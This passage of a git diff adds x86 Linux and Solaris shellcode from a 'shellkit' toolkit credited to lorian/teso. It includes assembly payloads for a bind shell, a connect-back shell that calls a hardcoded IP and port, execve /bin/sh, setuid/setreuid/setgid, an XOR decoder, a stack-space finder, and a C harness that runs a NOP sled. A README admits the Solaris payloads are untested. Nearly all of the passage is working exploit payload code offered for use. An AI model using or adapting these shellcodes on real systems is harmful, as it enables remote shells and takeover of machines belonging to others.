68 pushw $0x6962
69 pushw $0x2f2f
70 movl %esp, %ebx
71 pushl %edx
72 pushl %ebx
73 movl %esp, %ecx
74 int $0x80
75
76cend:
77
diff --git a/other/shellkit/x86_linux/read.s b/other/shellkit/x86_linux/read.s
new file mode 100644
index 0000000..870d125
--- /dev/null
+++ b/other/shellkit/x86_linux/read.s
@@ -0,0 +1,22 @@
1 .globl cbegin
2 .globl cend
3
4cbegin:
5 jmp cend
6
7rrr:
8 movb $0xfa, %dl /* length */
9
10 popl %ecx /* position */
11
12 push $0x41
13 pop %ebx
14 xorb $0x41, %bl
15
16 push $0x3
17 pop %eax
18 int $0x80 /* read */
19
20cend:
21 call rrr
22
diff --git a/other/shellkit/x86_linux/setgid.s b/other/shellkit/x86_linux/setgid.s
new file mode 100644
index 0000000..0786804
--- /dev/null
+++ b/other/shellkit/x86_linux/setgid.s
@@ -0,0 +1,14 @@
1 .globl cbegin
2 .globl cend
3
4cbegin:
5
6main:
7 pushb $0x2e
8 popl %eax
9 movw $0x4141, %ebx
10 xorw $0x4242, %ebx
11 int $0x80
12
13cend:
14
diff --git a/other/shellkit/x86_linux/setreuid.s b/other/shellkit/x86_linux/setreuid.s
new file mode 100644
index 0000000..c976312
--- /dev/null
+++ b/other/shellkit/x86_linux/setreuid.s
@@ -0,0 +1,16 @@
1 .globl cbegin
2 .globl cend
3
4cbegin:
5
6main:
7 pushl $0x46
8 popl %eax
9 movw $0x4141, %ebx
10 xorw $0x4141, %ebx
11 movw $0x4242, %ecx
12 xorw $0x4242, %ecx
13 int $0x80
14
15cend:
16
diff --git a/other/shellkit/x86_linux/setuid.s b/other/shellkit/x86_linux/setuid.s
new file mode 100644
index 0000000..e78410a
--- /dev/null
+++ b/other/shellkit/x86_linux/setuid.s
@@ -0,0 +1,14 @@
1 .globl cbegin
2 .globl cend
3
4cbegin:
5
6main:
7 pushb $0x17
8 popl %eax
9 movw $0x4141, %ebx
10 xorw $0x4242, %ebx
11 int $0x80
12
13cend:
14
diff --git a/other/shellkit/x86_linux/spset.s b/other/shellkit/x86_linux/spset.s
new file mode 100644
index 0000000..9bc19f4
--- /dev/null
+++ b/other/shellkit/x86_linux/spset.s
@@ -0,0 +1,36 @@
1/* x86 spset shellcode
2 *
3 * lorian / teso
4 */
5 .globl cbegin
6 .globl _cbegin
7 .globl cend
8 .globl _cend
9
10/* searches for 512 bytes "free" space on stack without destroying it
11 * like any kind of call would do...
12 *
13 * NOTE: your real shellcode must be terminated with
14 * \x78\x56\x34\x12 for this code to work...
15 */
16
17_cbegin:
18cbegin:
19
20 movl $0x12345678, %eax
21a:
22 cdq
23 movb $0x02, %dh
24b:
25 popl %ebx
26 pushl %ebx
27 incl %esp
28 decl %edx
29 jz c
30 cmpl %eax, %ebx
31 je a
32 jmp b
33c:
34
35_cend:
36cend:
diff --git a/other/shellkit/x86_linux/xor.s b/other/shellkit/x86_linux/xor.s
new file mode 100644
index 0000000..29e3b78
--- /dev/null
+++ b/other/shellkit/x86_linux/xor.s
@@ -0,0 +1,24 @@
1 .globl cbegin
2 .globl cend
3
4cbegin:
5 jmp XOR_down
6
7XOR_up:
8 popl %ebx
9 movb $0x26, %cl /* lenght */
10
11XORLoop:
12 xorb $0x64, %bl /* xor key */
13 incl %ebx
14 dec %cl
15 jnz XORLoop
16 jmp XORLoopDone
17
18XOR_down:
19 call XOR_up
20
21XORLoopDone:
22 .ascii ""
23
24cend:
diff --git a/other/shellkit/x86_noptest.c b/other/shellkit/x86_noptest.c
new file mode 100644
index 0000000..3c68ce0
--- /dev/null
+++ b/other/shellkit/x86_noptest.c
@@ -0,0 +1,25 @@
1
2#include <stdio.h>
3#include <stdlib.h>
4#include "shellcode.h"
5#include "x86_bsd.h"
6
7
8typedef void (* func_ptr)(void);
9
10int
11main (int argc, char *argv[])
12{
13 func_ptr fp;
14 unsigned char nopspace[20480];
15
16 x86_nop (nopspace, sizeof (nopspace), "\x25\x0d\x0a\x00", 4);
17 nopspace[sizeof (nopspace) - 1] = '\xcc';
18
19 fp = (func_ptr) nopspace;
20 fp ();
21
22 exit (EXIT_SUCCESS);
23}
24
25
diff --git a/other/shellkit/x86_solaris/README b/other/shellkit/x86_solaris/README
new file mode 100644
index 0000000..da1d06b
--- /dev/null
+++ b/other/shellkit/x86_solaris/README
@@ -0,0 +1,7 @@
1x86/solaris shellcodes
2
3lorian/teso
4
5all shellcodes are untested for now, cause i dont have a solaris x86
6system to test on. could be that they all dont work...
7will test as soon i install solaris x86 at home... (maybe within next week)
diff --git a/other/shellkit/x86_solaris/bindshell.s b/other/shellkit/x86_solaris/bindshell.s
new file mode 100644
index 0000000..1380747
--- /dev/null
+++ b/other/shellkit/x86_solaris/bindshell.s
@@ -0,0 +1,68 @@
1/* x86/BSD bindsh shellcode (89 bytes)
2
3 lorian / teso
4*/
5
6 .globl _cbegin
7 .globl cbegin
8 .globl _cend
9 .globl cend
10
11_cbegin:
12cbegin:
13 movl $0x3cfff8ff, %eax
14 notl %eax
15 pushl %eax
16 xorl %ebx, %ebx
17 mull %ebx
18 movb $0x9a, %al
19 pushl %eax
20 movl %esp, %ecx
21
22 pushl %ebx
23 incl %ebx
24 pushl %ebx
25 incl %ebx
26 pushl %ebx
27 movb $0xe6, %al
28 call *%ecx
29
30 xchgl %esi, %eax
31 pushl %edx
32 pushw $0x4444
33 pushw %bx
34 movl %esp, %ebp
35 pushl $0x10
36 pushl %ebp
37 pushl %esi
38 xorl %eax, %eax
39 movb $0xe8, %al
40 call *%ecx
41 movb $0xe9, %al
42 call *%ecx
43 pusha
44 popl %edi
45 movb $0xea, %al
46 call *%ecx
47a:
48 pushl %ebx
49 pushl %eax
50 movb $0x3e, %al
51 call *%ecx
52 decl %ebx
53 jns a
54 pushl %edx
55 push $0x68732F6E
56 push $0x69622F2F
57 movl %esp, %ebx
58 pushl %edx
59 pushl %ebx
60 movl %esp, %edi
61 pushl %edx
62 pushl %edi
63 pushl %ebx
64 movb $0x3b, %al
65 call *%ecx
66
67_cend:
68cend:
diff --git a/other/shellkit/x86_solaris/connectsh.s b/other/shellkit/x86_solaris/connectsh.s
new file mode 100644
index 0000000..155015a
--- /dev/null
+++ b/other/shellkit/x86_solaris/connectsh.s
@@ -0,0 +1,60 @@
1/* x86/solaris connectsh shellcode (83 bytes)
2
3 lorian / teso
4*/
5
6 .globl _cbegin
7 .globl cbegin
8 .globl _cend
9 .globl cend
10
11_cbegin:
12cbegin:
13 movl $0x3cfff8ff, %eax
14 notl %eax
15 pushl %eax
16 xorl %ebp, %ebp
17 mull %ebp
18 movb $0x9a, %al
19 pushl %eax
20 movl %esp, %ecx
21
22 pushl %ebp
23 incl %ebp
24 pushl %ebp
25 incl %ebp
26 pushl %ebp
27 movb $0xe6, %al
28 call *%ecx
29 xchgl %esi, %eax
30 pushl $0xcab058c3
31 pushw $0x4444
32 pushw %bp
33 movl %esp, %edi
34 pushl $0x10
35 pushl %edi
36 pushl %esi
37 xorl %eax, %eax
38 movb $0xeb, %al
39 call *%ecx
40a: pusha
41 pop %esi
42 movb $0x3e, %al
43 call *%ecx
44 decl %ebp
45 jns a
46 pushl %edx
47 push $0x68732F6E
48 push $0x69622F2F
49 movl %esp, %ebx
50 pushl %edx
51 pushl %ebx
52 movl %esp, %edi
53 pushl %edx
54 pushl %edi
55 pushl %ebx
56 movb $0x3b, %al
57 call *%ecx
58
59_cend:
60cend:
diff --git a/other/shellkit/x86_solaris/execve.s b/other/shellkit/x86_solaris/execve.s
new file mode 100644
index 0000000..428a2fe
--- /dev/null
+++ b/other/shellkit/x86_solaris/execve.s
@@ -0,0 +1,32 @@
1/* x86/solaris execve /bin/sh shellcode
2 *
3 * lorian / teso
4 */
5
6 .globl cbegin
7 .globl cend
8
9cbegin:
10 movl $0x3cfff8ff, %eax
11 notl %eax
12 pushl %eax
13 xorl %eax, %eax
14 cdq
15 movb $0x9a, %al
16 pushl %eax
17 movl %esp, %edi
18
19 movb $0x3b, %al
20 pushl %edx
21 push $0x68732F6E
22 push $0x69622F2F
23 movl %esp, %ebx
24 pushl %edx
25 pushl %ebx
26 movl %esp, %ecx
27 pushl %edx
28 pushl %ecx
29 pushl %ebx
30 call *%edi
31
32cend:
diff --git a/other/shellkit/x86_solaris/exit.s b/other/shellkit/x86_solaris/exit.s
new file mode 100644
index 0000000..d332c6f
--- /dev/null
+++ b/other/shellkit/x86_solaris/exit.s
@@ -0,0 +1,24 @@
1/* x86/solaris exit shellcode
2 *
3 * lorian / teso
4 */
5 .globl cbegin
6 .globl _cbegin
7 .globl cend
8 .globl _cend
9
10_cbegin:
11cbegin:
12 movl $0x3cfff8ff, %eax
13 notl %eax
14 pushl %eax
15 xorl %eax, %eax
16 movb $0x9a, %al
17 pushl %eax
18 movl %esp, %edi
19 movb $0x01, %al
20 call *%edi
21
22
23_cend:
24cend: